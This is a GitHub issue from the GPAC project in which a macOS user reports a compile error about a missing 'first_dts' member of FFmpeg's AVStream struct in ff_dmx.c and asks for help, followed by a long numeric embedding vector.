This is a GitHub Issue repo:gpac owner:gpac Title : GPAC Build error: no member named 'first_dts' in 'struct AVStream' Issue date: --- start body --- I am building GPAC on OSX. When running `make` in directory gpac_public: ``` cd ../gpac_public ./configure --extra-cflags=-Wno-deprecated make sudo make install ``` I encounter an error called "filters/ff_dmx.c:249:16: error: no member named 'first_dts' in 'struct AVStream'" I have already looked for `ff_dmx.c` and `libavformat/avformat.h` where "struct AVStream" is defined. I even include `libavformat/avformat.h` into `ff_dmx.c`. However, it does not solve the problem. Can anyone encounter this error? How to fix it? --- end body ---
705
[ -0.028175868093967438, 0.028705384582281113, -0.01720929704606533, 0.042528558522462845, 0.0030116268899291754, -0.007684960961341858, -0.035839926451444626, 0.05094509199261665, -0.011064114049077034, 0.023145457729697227, 0.0015275863697752357, 0.0032641924917697906, 0.001363854156807065, 0.01589943841099739, -0.005134919658303261, 0.05640747398138046, -0.005291684530675411, 0.02554221823811531, -0.00599538441747427, 0.0024124367628246546, 0.034195639193058014, -0.00764315715059638, 0.01532811764627695, 0.041553135961294174, 0.008019392378628254, 0.006221822462975979, -0.02909555472433567, 0.026489775627851486, -0.028621776029467583, -0.014227280393242836, 0.032662827521562576, 0.020442135632038116, -0.029959503561258316, 0.009350151754915714, 0.0329972580075264, 0.0036648137029260397, 0.02423236146569252, 0.08472269028425217, 0.026963552460074425, 0.007252987008541822, -0.04347611591219902, -0.031743139028549194, -0.06376497447490692, 0.004075885750353336, -0.010485826060175896, 0.02545861154794693, 0.007287823595106602, 0.03073984384536743, -0.02084624022245407, -0.009719420224428177, 0.016428954899311066, 0.021083129569888115, -0.022490529343485832, -0.011029277928173542, -0.0279111098498106, -0.012771109119057655, 0.03809734061360359, -0.008353824727237225, -0.01679125614464283, 0.0291791632771492, 0.02258807234466076, 0.012582991272211075, 0.0075107780285179615, 0.017320772632956505, -0.010680911131203175, 0.02254626899957657, -0.029680810868740082, 0.0655486062169075, -0.006814045365899801, 0.018031440675258636, -0.006294979248195887, -0.023911863565444946, 0.005166272632777691, 0.023145457729697227, 0.010158361867070198, -0.07769962400197983, 0.024302033707499504, 0.038208816200494766, -0.0281201284378767, 0.0123670045286417, -0.037066176533699036, -0.013495711609721184, -0.05562713369727135, 0.007266921456903219, 0.005096599459648132, 0.01982901059091091, -0.024761877954006195, -0.048186030238866806, -0.011516990140080452, -0.003001175820827484, -0.002304443158209324, 0.047767989337444305, 0.060755085200071335, -0.002104132669046521, -0.023800386115908623, 0.04381055012345314, -0.013614155352115631, -0.0075107780285179615, -0.010109590366482735, -0.030544759705662727, -0.051279522478580475, -0.01691666804254055, 0.05735503137111664, -0.009607942774891853, 0.03349890559911728, 0.007852177135646343, 0.03464154526591301, -0.002161612967029214, 0.02105526067316532, 0.11242477595806122, 0.001245409599505365, 0.025848781690001488, -0.022309379652142525, 0.008263248950242996, -0.006180018652230501, 0.050554919987916946, -0.03745634853839874, -0.026280755177140236, 0.014965817332267761, 0.01408096682280302, -0.013725632801651955, -0.028705384582281113, -0.049718841910362244, 0.012311265803873539, -0.014283019118010998, 0.034780893474817276, 0.014826470986008644, -0.013035867363214493, -0.023075785487890244, 0.01928555965423584, -0.04300233721733093, -0.025890585035085678, 0.016219936311244965, -0.008123902603983879, 0.011788716539740562, -0.009182936511933804, -0.019174082204699516, 0.043030206114053726, -0.015258444473147392, 0.015676483511924744, -0.006326332222670317, -0.012666599825024605, 0.036982569843530655, 0.0010503244120627642, 0.006573672406375408, -0.03252347931265831, 0.006876751314848661, -0.0017731845146045089, -0.006521417293697596, -0.00653535220772028, -0.025723369792103767, -0.04771225154399872, 0.028984077274799347, -0.011301003396511078, 0.018895389512181282, 0.0028357019182294607, -0.0069673266261816025, -0.010158361867070198, -0.0019247239688411355, -0.039992451667785645, -0.010694845579564571, -0.02859390713274479, 0.006932489573955536, -0.011830519884824753, -0.006960358936339617, -0.0033164473716169596, 0.014742862433195114, 0.0029349862597882748, -0.024427445605397224, 0.005918743554502726, -0.014659254811704159, 0.024455316364765167, -0.013607188127934933, 0.027158638462424278, -0.03957441449165344, -0.011140754446387291, 0.03634157404303551, 0.05172543227672577, -0.021501168608665466, -0.01635928265750408, -0.014798601157963276, 0.021542973816394806, 0.023661039769649506, -0.010367381386458874, 0.002363665495067835, -0.02317332848906517, 0.029875895008444786, -0.03135296702384949, 0.017738813534379005, -0.023075785487890244, 0.0036578462459146976, 0.021250344812870026, -0.0012898263521492481, -0.003354767570272088, 0.03536614775657654, -0.01606665551662445, -0.05175330117344856, -0.01741831563413143, -0.038376033306121826, -0.003133554942905903, 0.004135108087211847, -0.02761848270893097, 0.008353824727237225, 0.009294413030147552, -0.03455793857574463, 0.009747290052473545, -0.025695499032735825, 0.04918932542204857, 0.01383014302700758, -0.02352169342339039, -0.020609350875020027, -0.021041326224803925, -0.000997198629193008, -0.0043476116843521595, 0.014701059088110924, -0.0018132467521354556, -0.0006431713118217885, 0.02867751568555832, 0.007273888681083918, -0.023479890078306198, 0.05035983398556709, -0.030293935909867287, -0.004117690026760101, 0.03458580747246742, -0.037790779024362564, -0.021626580506563187, -0.015146967954933643, -0.018073244020342827, -0.021835600957274437, 0.013941620476543903, 0.003469728631898761, 0.028900470584630966, -0.007601352874189615, -0.002037942875176668, 0.017195360735058784, -0.004086337052285671, -0.0066398619674146175, 0.01641502045094967, -0.0325792171061039, -0.0052847168408334255, 0.00868825614452362, 0.01610845886170864, 0.011962899006903172, -0.0077546341344714165, 0.02545861154794693, 0.054623838514089584, -0.002447273349389434, 0.020288854837417603, -0.03439072147011757, -0.00488409586250782, 0.027716023847460747, 0.007733732461929321, 0.006657280493527651, 0.012415776029229164, -0.014617450535297394, 0.02373071387410164, -0.012220690958201885, -0.00764315715059638, -0.016345348209142685, -0.05175330117344856, 0.0042396183125674725, -0.003457535756751895, -0.01720929704606533, -0.007197248283773661, -0.030516888946294785, -0.0001814770803321153, -0.0009109779493883252, -0.003562045516446233, 0.02398153766989708, -0.012541187927126884, 0.0018027956830337644, 0.010130492970347404, -0.02545861154794693, 0.012269461527466774, 0.02076263353228569, -0.011893225833773613, -0.005469351075589657, -0.027688154950737953, 0.010102623142302036, 0.019132278859615326, -0.034697286784648895, 0.01463138498365879, -0.032802172005176544, -0.0008025488932617009, -0.012039540335536003, 0.018449479714035988, -0.006141697987914085, -0.036815352737903595, 0.02190527506172657, 0.019689664244651794, 0.03547762706875801, 0.023535627871751785, -0.05858128145337105, 0.002199933398514986, 0.0009919730946421623, 0.00811693537980318, 0.00558082852512598, -0.004361546132713556, -0.0006854107487015426, -0.011071081273257732, 0.005215043667703867, 0.013676861301064491, 0.016568301245570183, -0.021793797612190247, -0.04347611591219902, 0.028788993135094643, -0.014547777362167835, 0.00009427663462702185, 0.047266341745853424, -0.035589102655649185, 0.017878159880638123, -0.02435777336359024, -0.006336783524602652, 0.006594574544578791, 0.003476695856079459, -0.0021198091562837362, -0.004870160948485136, -0.01564861461520195, -0.0351153239607811, -0.009607942774891853, -0.00018506961350794882, -0.002863571047782898, -0.05573861300945282, -0.02127821557223797, 0.012889553792774677, -0.014046129770576954, -0.027674220502376556, -0.014519908465445042, -0.04461875930428505, -0.001835890463553369, -0.0032694179099053144, 0.006455227732658386, 0.040410492569208145, -0.00925957690924406, 0.006605025380849838, -0.031436577439308167, -0.002990724751725793, -0.017474055290222168, 0.0021546457428485155, -0.02516598254442215, -0.013286691159009933, 0.012408807873725891, 0.0018846618477255106, -0.0074550393037498, -0.023103654384613037, 0.008360791951417923, -0.0021511621307581663, 0.015077294781804085, 0.033721860498189926, -0.019689664244651794, 0.0008352082804776728, 0.009977211244404316, 0.04500892758369446, -0.019048670306801796, 0.02364710532128811, -0.00006825802847743034, -0.010896898806095123, -0.053007420152425766, 0.0025082374922931194, -0.011816585436463356, -0.005288200918585062, -0.021765926852822304, 0.0363694429397583, 0.035756319761276245, 0.002649325877428055, 0.01814291812479496, -0.013328495435416698, -0.011468219570815563, 0.02088804543018341, 0.005859521683305502, -0.013579319231212139, 0.04347611591219902, -0.028566038236021996, 0.02182166650891304, -0.029597202315926552, -0.013725632801651955, 0.021459365263581276, -0.005699273198843002, -0.028984077274799347, -0.008653419092297554, -0.055125486105680466, -0.006274077575653791, 0.03388907387852669, -0.028984077274799347, 0.02545861154794693, -0.007615287788212299, -0.002985499333590269, 0.04105148836970329, -0.041636742651462555, -0.054874662309885025, -0.029569333419203758, 0.009419824928045273, -0.0007690186612308025, -0.044981058686971664, -0.02803652174770832, -0.013851044699549675, -0.0009127197554334998, -0.044563017785549164, 0.04300233721733093, 0.00004455278758541681, 0.046207308769226074, -0.004291872959583998, 0.006713018752634525, -0.005977965891361237, -0.020483938977122307, 0.028956208378076553, -0.009371054358780384, 0.0030046594329178333, 0.039769500494003296, 0.031910356134176254, 0.013753502629697323, -0.019759338349103928, -0.04994179680943489, -0.002976790303364396, -0.004560115281492472, 0.024469250813126564, -0.002395018469542265, 0.0010755810653790832, -0.020525744184851646, 0.03319234400987625, 0.014422365464270115, 0.008089065551757812, -0.010221067816019058, 0.020121637731790543, 0.0456777922809124, 0.04985818639397621, -0.026420101523399353, 0.04080066457390785, -0.015216641128063202, -0.011321905069053173, 0.04247282072901726, -0.024009406566619873, 0.015495333820581436, 0.000281958986306563, 0.0011609307257458568, -0.011523958295583725, 0.00272770831361413, -0.053899236023426056, 0.007691928185522556, 0.006556254345923662, -0.059528835117816925, 0.013983423821628094, -0.00007952549640322104, 0.002816541586071253, 0.04592861607670784, -0.037790779024362564, -0.053313981741666794, -0.036146488040685654, 0.0006296721403487027, -0.023716779425740242, 0.0034226991701871157, 0.023117588832974434, 0.0003555513685569167, -0.015787960961461067, -0.008137837052345276, -0.002673711394891143, 0.0045566316694021225, 0.010541564784944057, 0.03712191432714462, -0.03475302457809448, -0.013711698353290558, 0.013864979147911072, 0.008667354471981525, 0.024580728262662888, 0.042528558522462845, 0.028106193989515305, -0.01974540390074253, -0.019856879487633705, -0.01516090240329504, 0.0070927380584180355, 0.00418736319988966, 0.01758553273975849, 0.03845963999629021, 0.02579304203391075, -0.010325578041374683, 0.04110722616314888, -0.021765926852822304, -0.019299494102597237, 0.013175214640796185, -0.046708956360816956, 0.01401826087385416, -0.00364739540964365, 0.005148854106664658, 0.024901224300265312, -0.0414416566491127, -0.0010006822412833571, -0.014575647190213203, 0.028566038236021996, -0.04684830084443092, 0.020024096593260765, 0.034112028777599335, 0.03260708600282669, 0.01826833002269268, -0.02038639783859253, -0.002078005112707615, 0.032077569514513016, -0.00650399923324585, 0.01594124361872673, 0.02063722163438797, -0.009545236825942993, -0.00996327679604292, 0.013600220903754234, 0.012924390845000744, -0.017111754044890404, 0.018742108717560768, -0.022406920790672302, -0.002419403987005353, -0.006085959728807211, -0.015049424953758717, 0.0032258720602840185, -0.028384888544678688, 0.0095173679292202, -0.010736649855971336, -0.03843177109956741, -0.01313341036438942, -0.005974482279270887, 0.015551072545349598, 0.006486580707132816, -0.0036578462459146976, -0.002938469871878624, -0.001130448654294014, -0.019856879487633705, -0.014492038637399673, 0.0024803681299090385, -0.00624969182536006, 0.018923258408904076, 0.00012650052667595446, -0.01167027186602354, 0.021640514954924583, 0.0033808951266109943, -0.02626682072877884, -0.010130492970347404, -0.0016390635864809155, 0.03740060701966286, -0.01835193857550621, 0.018853584304451942, -0.0019090474816039205, 0.04322529211640358, 0.01066000945866108, -0.02377251721918583, -0.03570058196783066, 0.026698794215917587, -0.023619236424565315, 0.005828168708831072, -0.015969112515449524, -0.009921472519636154, 0.0016399344895035028, 0.025277459993958473, -0.011551827192306519, 0.0006344621651805937, 0.0025204303674399853, -0.017195360735058784, -0.009141132235527039, 0.015592876821756363, 0.008019392378628254, -0.007406267803162336, -0.007726764772087336, 0.028872599825263023, 0.012067409232258797, 0.03734486922621727, -0.022225771099328995, 0.0030708489939570427, 0.004887579474598169, -0.01822652667760849, -0.014087934046983719, 0.007712830323725939, 0.02042820118367672, 0.017836354672908783, -0.04570566117763519, 0.008932112716138363, -0.001534553593955934, -0.03519893437623978, 0.039992451667785645, 0.026043865829706192, 0.0015911632217466831, 0.01974540390074253, 0.013035867363214493, -0.03377759829163551, -0.014310888014733791, -0.020372461527585983, 0.02427416481077671, -0.01654043234884739, -0.005671403836458921, -0.009099327959120274, -0.015578941442072392, 0.012631762772798538, -0.017404381185770035, -0.002431596862152219, -0.04224986582994461, -0.011551827192306519, -0.009621878154575825, 0.011405513621866703, -0.00437548104673624, -0.010332545265555382, 0.04308594763278961, -0.017961766570806503, -0.008207510225474834, 0.01606665551662445, 0.0321333110332489, 0.004445154219865799, 0.012785043567419052, 0.024692203849554062, -0.04004819318652153, -0.02359136752784252, -0.022615941241383553, 0.017613401636481285, -0.0006327203009277582, -0.016303543001413345, -0.03531040996313095, 0.005936162080615759, -0.011029277928173542, 0.025221722200512886, 0.059194404631853104, -0.007315692491829395, 0.009761224500834942, 0.035839926451444626, -0.006270593963563442, 0.03628583624958992, -0.001997880870476365, 0.03818094730377197, 0.011475186794996262, 0.00261623109690845, 0.01541172619909048, -0.020079834386706352, 0.023493824526667595, 0.04110722616314888, 0.019564252346754074, -0.01801750622689724, -0.02313152328133583, -0.04553844407200813, -0.004277938511222601, 0.01433875784277916, -0.03188248723745346, -0.017989637330174446, -0.029959503561258316, -0.00020553612557705492, 0.03057262860238552, -0.027256181463599205, -0.022406920790672302, -0.0013490485725924373, -0.0507500059902668, -0.022685615345835686, -0.006939457263797522, 0.01700027659535408, -0.02105526067316532, -0.0036613300908356905, 0.0035341763868927956, 0.003894735360518098, -0.005539024714380503, 0.028357017785310745, -0.016052719205617905, -0.028816862031817436, 0.018937192857265472, 0.017864225432276726, 0.008221445605158806, -0.04960736259818077, 0.0215708427131176, 0.019898684695363045, 0.020623285323381424, -0.028900470584630966, -0.042946599423885345, -0.023925798013806343, 0.0016486436361446977, -0.03703830763697624, 0.026643056422472, 0.01755766198039055, 0.023061851039528847, 0.009169001132249832, 0.007012614049017429, 0.021765926852822304, 0.018574891611933708, -0.019522449001669884, 0.018115049228072166, -0.014547777362167835, -0.016178131103515625, -0.011189525946974754, -0.001954335020855069, 0.02423236146569252, -0.0010337770218029618, 0.007608320564031601, -0.001947367680259049, -0.011955931782722473, 0.007775536272674799, 0.043364640325307846, 0.004542696755379438, 0.011210428550839424, 0.00418736319988966, -0.042528558522462845, 0.004365030210465193, 0.0047238473780453205, 0.021375756710767746, 0.008764896541833878, 0.01594124361872673, 0.07374218106269836, -0.034362852573394775, -0.013530547730624676, 0.023243000730872154, 0.01421334594488144, -0.014352692291140556, -0.020205246284604073, -0.01027680654078722, -0.0008743994403630495, -0.007141509559005499, -0.027088964357972145, 0.0050269258208572865, 0.01974540390074253, -0.006981261074542999, -0.00894604716449976, -0.009468596428632736, 0.020274920389056206, 0.0044381869956851006, 0.017278969287872314, -0.022824961692094803, -0.010980506427586079, 0.006521417293697596, 0.011301003396511078, -0.020038031041622162, -0.0062636262737214565, -0.028064390644431114, 0.0007864369545131922, -0.001879436313174665, -0.023549562320113182, -0.006702567916363478, -0.014659254811704159, 0.014924013055860996, 0.008528007194399834, 0.014505974017083645, 0.010673943907022476, -0.01192806288599968, 0.010945669375360012, -0.02173805795609951, -0.03377759829163551, 0.05091722309589386, 0.013300626538693905, -0.026670925319194794, -0.013662926852703094, -0.001288955332711339, 0.016693713143467903, 0.029848026111721992, 0.0007215537480078638, -0.002435080474242568, 0.027674220502376556, -0.010450989939272404, -0.013307593762874603, -0.005960547830909491, -0.009419824928045273, 0.0022539300844073296, 0.0047238473780453205, -0.05615665018558502, -0.003922604955732822, 0.003894735360518098, 0.0019578186329454184, -0.000021827327145729214, -0.03023819625377655, 0.004337160848081112, -0.003100460162386298, 0.01924375630915165, -0.018686369061470032, -0.004034081939607859, -0.005479802377521992, 0.002992466790601611, -0.036564528942108154, -0.002335796132683754, -0.006416907534003258, 0.0020954234059900045, -0.005141886882483959, 0.0036125588230788708, -0.003208453767001629, 0.010332545265555382, 0.0033199309837073088, -0.015105163678526878, 0.004901513922959566, -0.04746142774820328, -0.010917800478637218, 0.01683306135237217, -0.005242913030087948, 0.004236134234815836, 0.008172674104571342, -0.030516888946294785, 0.016401086002588272, -0.04420071840286255, 0.012736272998154163, -0.05303528904914856, 0.008263248950242996, 0.03243987262248993, -0.04068918526172638, 0.026113539934158325, 0.02381432242691517, 0.0007907915278337896, -0.0030638817697763443, 0.010778454132378101, -0.012764141894876957, 0.05063852667808533, -0.02676846832036972, 0.011078049428761005, -0.007026548497378826, -0.007047450635582209, 0.028900470584630966, -0.00444167060777545, -0.02203068695962429, -0.0025831363163888454, 0.0074202027171850204, -0.0003590350388549268, -0.04545483738183975, -0.016679778695106506, -0.002447273349389434, -0.02127821557223797, -0.023159392178058624, -0.02892833948135376, 0.012464546598494053, -0.010193198919296265, -0.013014965690672398, 0.02288069948554039, -0.0007498585036955774, -0.006862816400825977, -0.0034174735192209482, -0.016888799145817757, -0.029374247416853905, -0.026963552460074425, 0.027925044298171997, -0.02304791659116745, 0.008973916061222553, 0.006751339416950941, -0.009447694756090641, 0.0054763187654316425, -0.055209092795848846, 0.00850013829767704, -0.0003272466128692031, 0.01725110039114952, -0.014575647190213203, -0.0298201572149992, 0.005166272632777691, -0.015829766169190407, 0.030628366395831108, -0.03726126253604889, 0.010680911131203175, -0.017864225432276726, 0.010039917193353176, -0.005215043667703867, 0.0190347358584404, -0.013321528211236, -0.007531679701060057, -0.04021540656685829, -0.04361546412110329, -0.0019055637530982494, 0.0006240111542865634, -0.008040294982492924, -0.006033704616129398, -0.004392899107187986, -0.0011539633851498365, 0.02051180973649025, 0.025695499032735825, 0.026921749114990234, 0.00536135770380497, -0.011635434813797474, 0.0145895816385746, -0.02190527506172657, -0.013328495435416698, 0.03335955739021301, -0.03269069641828537, 0.029680810868740082, 0.028357017785310745, -0.025235656648874283, 0.008534974418580532, -0.0017810227582231164, 0.014478104189038277, -0.00233057071454823, -0.020539678633213043, 0.023758582770824432, 0.004389415495097637, -0.019229819998145103, -0.008144804276525974, 0.0014143672306090593, -0.013084638863801956, -0.005399677902460098, -0.0033634768333286047, 0.014241214841604233, -0.03756782412528992, -0.02431597001850605, 0.007197248283773661, 0.02026098594069481, 0.03274643421173096, -0.034446462988853455, -0.010820257477462292, 0.0130079984664917, -0.011196493171155453, -0.018128983676433563, -0.010820257477462292, -0.011523958295583725, 0.004079369828104973, 0.004713396076112986, 0.0056121814996004105, 0.0045148273929953575, 0.006855849176645279, -0.005974482279270887, 0.017474055290222168, -0.0003522854531183839, -0.031185753643512726, -0.009649747051298618, -0.02123641036450863, -0.00615214928984642, 0.00875096209347248, 0.00817964132875204, 0.018115049228072166, 0.013906783424317837, -0.017906028777360916, 0.02452498860657215, 0.024037275463342667, -0.016763387247920036, -0.011126819998025894, 0.01471499353647232, 0.011746912263333797, -0.01872817426919937, -0.029207032173871994, -0.028022587299346924, 0.005037377122789621, -0.0042570363730192184, 0.008541942574083805, 0.011726010590791702, 0.03912850469350815, -0.019633926451206207, 0.025096310302615166, 0.004776102025061846, 0.02820373699069023, 0.024678269401192665, -0.009078426286578178, -0.016303543001413345, 0.00009166388917947188, 0.02402334101498127, 0.03082345239818096, 0.003929572179913521, 0.0038355132564902306, 0.020358527079224586, -0.01615026220679283, 0.006716502830386162, -0.007371431216597557, 0.0011487379670143127, -0.007096222136169672, 0.007005646824836731, -0.02423236146569252, 0.02651764452457428, 0.008681288920342922, -0.006131247151643038, -0.0056017301976680756, 0.01471499353647232, 0.014352692291140556, -0.009280478581786156, 0.017655204981565475, -0.04002032428979874, -0.01446416974067688, -0.004236134234815836, -0.03937932848930359, -0.026531578972935677, -0.01759946718811989, -0.02668485976755619, 0.009719420224428177, -0.007719797547906637, -0.014687123708426952, 0.037623561918735504, -0.002640616614371538, 0.011057146824896336, 0.03447433188557625, -0.007608320564031601, -0.01878391206264496, 0.017710942775011063, 0.01826833002269268, 0.011816585436463356, -0.009398923255503178, -0.006678182166069746, -0.022128228098154068, 0.02232331410050392, -0.006814045365899801, -0.01860276237130165, 0.018923258408904076, 0.004434703383594751, 0.04534336179494858, 0.0018445996101945639, -0.005239429417997599, -0.020734762772917747, -0.021222475916147232, -0.026378298178315163, 0.010924767702817917, 0.016819125041365623, -0.017710942775011063, -0.0077964384108781815, -0.01033951248973608, 0.010012048296630383, 0.0060267373919487, 0.018881455063819885, 0.001739218831062317, -0.022225771099328995, 0.034697286784648895, 0.04166461154818535, -0.046374525874853134, 0.02706109546124935, 0.015746157616376877, 0.0022103842347860336, 0.0016939311753958464, -0.00450437655672431, -0.011558794416487217, 0.00780340563505888, -0.005984933581203222, -0.01984294503927231, -0.020316723734140396, -0.0171256884932518, 0.022365117445588112, 0.007308725267648697, 0.004957252647727728, -0.03138083964586258, 0.009510400705039501, -0.0007089254795573652, -0.01941097155213356, 0.0061556329019367695, -0.013746535405516624, 0.006869783625006676, -0.0012070892844349146, -0.015397791750729084, 0.028217671439051628, 0.011496088467538357, 0.015258444473147392, -0.011398546397686005, -0.007496843114495277, 0.014840405434370041, 0.01992655359208584, 0.007887013256549835, 0.015314183197915554, 0.00290189147926867, 0.012631762772798538, 0.010095655918121338, 0.027423396706581116, -0.009907538071274757, 0.013795305974781513, 0.004072402138262987, 0.011015343479812145, 0.0034645029809325933, -0.013690796680748463, -0.00321890483610332, -0.016526497900485992, -0.003461019368842244, 0.011064114049077034, 0.030934929847717285, 0.0014065289869904518, -0.03455793857574463, -0.030043112114071846, -0.0068175289779901505, 0.0067757247015833855, 0.02774389460682869, 0.00010369341180194169, -0.02304791659116745, -0.008451366797089577, -0.005093115381896496, 0.007949719205498695, 0.03519893437623978, -0.011914128437638283, 0.008632517419755459, 0.006301946938037872, 0.0030203359201550484, 0.00024080822186078876, 0.002624940127134323, 0.001329888473264873, -0.0036961666774004698, -0.01793389767408371, 0.034446462988853455, -0.006674698553979397, -0.013377266936004162, 0.016178131103515625, -0.01729290373623371, 0.026211081072688103, 0.004730814602226019, 0.021682320162653923, -0.022211836650967598, 0.004403350409120321, -0.002046652138233185, -0.019815076142549515, 0.013983423821628094, -0.012680534273386002, 0.010074754245579243, -0.012387906201183796, -0.008918177336454391, -0.0071833133697509766, -0.019689664244651794, -0.012353070080280304, 0.012234625406563282, 0.002863571047782898, -0.03489236906170845, 0.004493925720453262, 0.006448260508477688, -0.018282264471054077, -0.01186535693705082, 0.005033893510699272, -0.01700027659535408, -0.020038031041622162, 0.003016852308064699, -0.04166461154818535, -0.03160379081964493, 0.030098849907517433, 0.020874109119176865, 0.07268314808607101, 0.03592353314161301, -0.0073783984407782555, -0.005918743554502726, -0.00041673320811241865, 0.0026667441707104445, -0.0006296721403487027, -0.014937947504222393, -0.021807732060551643, 0.0312972292304039, -0.006545803043991327, 0.0013969489373266697, 0.01847735047340393, -0.00574107700958848, -0.017906028777360916, -0.019815076142549515, 0.011753879487514496, -0.015174836851656437, -0.009482530876994133, 0.00111825589556247, -0.013021932914853096, 0.01876997761428356, 0.011064114049077034, -0.03023819625377655, -0.002335796132683754, -0.0070160976611077785, -0.005556442774832249, -0.013502678833901882, -0.007385366130620241, 0.0001632967178011313, -0.011022310703992844, -0.0056435344740748405, -0.005162789020687342, 0.00111825589556247, 0.012896521016955376, 0.019982291385531425, 0.015355987474322319, -0.014394496567547321, -0.004462572745978832, -0.0042709712870419025, 0.016247805207967758, -0.008618582971394062, -0.0001892064610728994, 0.017710942775011063, 0.0025587505660951138, -0.04414498060941696, 0.019174082204699516, 0.01635928265750408, 0.030377542600035667, -0.0019926554523408413, -0.001506684347987175, -0.03352677449584007, 0.014979751780629158, 0.05409432202577591, 0.0007389720412902534, -0.0009397181565873325, -0.014025228098034859, 0.004999056458473206, -0.009412857703864574, -0.0066503132693469524, 0.02051180973649025, 0.0010050368728116155, 0.01957818679511547, 0.02828734554350376, 0.00501299137249589, -0.005653985310345888, -0.012137082405388355, 0.020330658182501793, 0.0120534747838974, 0.016275674104690552, 0.015676483511924744, 0.012805946171283722, -0.011377643793821335, 0.0026388748083263636, -0.012966194190084934, 0.021933143958449364, -0.011468219570815563, 0.0075107780285179615, -0.017906028777360916, 0.0037170685827732086, 0.020274920389056206, 0.009796060621738434, -0.003873833455145359, 0.007531679701060057, -0.026043865829706192, 0.007524712476879358, -0.0011644144542515278, -0.015592876821756363, 0.017056014388799667, -0.020288854837417603, 0.011391578242182732, -0.00063054304337129, 0.045482706278562546, -0.00043850610381923616, 0.010325578041374683, 0.0018428578041493893, 0.03882194310426712, 0.008771863766014576, -0.006162600126117468, -0.0035150160547345877, 0.029931634664535522, 0.009308348409831524, 0.011781749315559864, 0.02630862407386303, -0.008541942574083805, -0.006890685763210058, 0.01414367277175188, 0.01899293251335621, 0.011983801610767841, -0.008381693623960018, -0.017752747982740402, -0.009496466256678104, -0.004601919092237949, -0.044172849506139755, -0.0049502854235470295, -0.01772487908601761, 0.02647584117949009, 0.020985586568713188, 0.008381693623960018, -0.007712830323725939, -0.024162687361240387, -0.0050269258208572865, 0.03363825008273125, 0.003926088567823172, 0.009412857703864574, 0.001320308307185769, -0.01606665551662445, -0.02901194803416729, 0.030349673703312874, 0.02591845393180847, 0.010102623142302036, 0.0177666824311018, 0.008604648523032665, -0.024288099259138107, 0.04464662820100784, 0.00554947555065155, -0.015662549063563347, 0.010353446938097477, 0.008151771500706673, -0.006065057590603828, -0.03480876237154007, 0.021222475916147232, 0.008646451868116856, 0.0158576350659132, 0.022086424753069878, 0.020121637731790543, 0.023117588832974434, -0.018449479714035988, 0.02364710532128811, 0.030767712742090225, -0.012185853905975819, -0.0022190934978425503, -0.0002841362729668617, 0.023187262937426567, 0.006737404502928257, -0.0010694846278056502, 0.013419070281088352, -0.028259476646780968, -0.01801750622689724, -0.004284905735403299, 0.003974859602749348, 0.03152018412947655, 0.026963552460074425, -0.005302135366946459, 0.009113263338804245, 0.0003599059418775141, -0.00995630957186222, -0.00266500236466527, -0.030043112114071846, -0.016164196655154228, 0.00479003693908453, 0.0028931822162121534, -0.02803652174770832, -0.023995472118258476, -0.0001652562787057832, -0.029457855969667435, -0.01186535693705082, 0.018714237958192825, 0.0017461861716583371, 0.003478437662124634, 0.018115049228072166, 0.022490529343485832, -0.00989360362291336, -0.016512563452124596, 0.0499139279127121, -0.01928555965423584, 0.03032180480659008, 0.009252609685063362, -0.014101868495345116, 0.005145370494574308, 0.02867751568555832, 0.012952259741723537, -0.044813841581344604, -0.026211081072688103, -0.02570943348109722, -0.017404381185770035, -0.009775158949196339, -0.016038784757256508, -0.024929093196988106, -0.013537514954805374, 0.017697008326649666, -0.016428954899311066, 0.021891338750720024, -0.017404381185770035, 0.004236134234815836, -0.039518676698207855, 0.0008395628537982702, 0.003762356238439679, -0.001165285357274115, 0.0021546457428485155, -0.017111754044890404, 0.014868274331092834, 0.01882571540772915, 0.03327595070004463, 0.007636189926415682, -0.004075885750353336, 0.012095279060304165, -0.015369921922683716, 0.0016190324677154422, 0.009238675236701965, -0.00361604243516922, 0.014561711810529232, 0.012819880619645119, -0.007719797547906637, -0.030907059088349342, -0.008465301245450974, 0.04358759522438049, -0.004901513922959566, -0.01199076883494854, -0.024511054158210754, -0.003544627223163843, 0.03283004090189934, 0.018449479714035988, -0.004779586102813482, -0.002659776946529746, -0.010095655918121338, -0.012109213508665562, -0.026029931381344795, 0.016094524413347244, -0.012109213508665562, -0.0031300713308155537, -0.020623285323381424, -0.009886636398732662, -0.0024925610050559044, -0.013676861301064491, -0.0002471223706379533, -0.0006997808231972158, 0.03408415988087654, -0.011649370193481445, 0.017529793083667755, -0.009266544133424759, 0.02655944786965847, -0.0018132467521354556, 0.0066990843042731285, -0.00805422943085432, 0.05297955125570297, 0.002929760841652751, -0.0177666824311018, 0.0452597513794899, 0.010221067816019058, 0.021961012855172157, 0.006476129870861769, -0.004020147491246462, 0.005016474984586239, -0.009092360734939575, 0.02304791659116745, 0.000292845448711887, 0.013168246485292912, 0.012332167476415634, -0.00186375982593745, -0.026489775627851486, 0.015955178067088127, 0.00700913043692708, -0.00016242580022662878, -0.034279245883226395, 0.00006902007589815184, 0.004706428851932287, 0.009329250082373619, -0.034613676369190216, 0.008541942574083805, -0.00004183117562206462, 0.0052359458059072495, -0.016554366797208786, 0.0006928135408088565, -0.02246266044676304, -0.012220690958201885, 0.008911210112273693, 0.018686369061470032, -0.021222475916147232, -0.02465040050446987, 0.005608697887510061, 0.01091083325445652, 0.008207510225474834, -0.029569333419203758, 0.016247805207967758, -0.00589784188196063, -0.028621776029467583, 0.04985818639397621, 0.019299494102597237, -0.007559549063444138, 0.005131436046212912, 0.010109590366482735, 0.02123641036450863, 0.00995630957186222, -0.007601352874189615, -0.0010825482895597816, -0.004176912363618612, -0.0024873355869203806, 0.012199788354337215, -0.009078426286578178, 0.0030621399637311697, -0.02541680634021759, -0.037484217435121536, -0.012785043567419052, 0.02926276996731758, 0.015021556057035923, 0.003008143277838826, 0.0010355188278481364, 0.019466709345579147, -0.02884473092854023, 0.02194707840681076, 0.02859390713274479, -0.010576401837170124, -0.05141886696219444, 0.010207133367657661, 0.003203228348866105, -0.003429666394367814, 0.021152803674340248, -0.010855094529688358, -0.0004946801927872002, 0.016345348209142685, 0.020079834386706352, 0.011245264671742916, -0.0073017580434679985, -0.0038773170672357082, 0.02329874038696289, -0.005378775764256716, -0.006235756911337376, 0.011753879487514496, -0.015133032575249672, 0.006974293850362301, 0.017348643392324448, -0.023103654384613037, 0.009712453000247478, 0.03294152021408081, 0.01658223755657673, 0.03188248723745346, -0.0008129999041557312, -0.014673189260065556, -0.0031527152750641108, -0.013495711609721184, -0.0126875014975667, -0.04283512383699417, 0.004713396076112986, -0.02325693517923355, 0.01598304696381092, 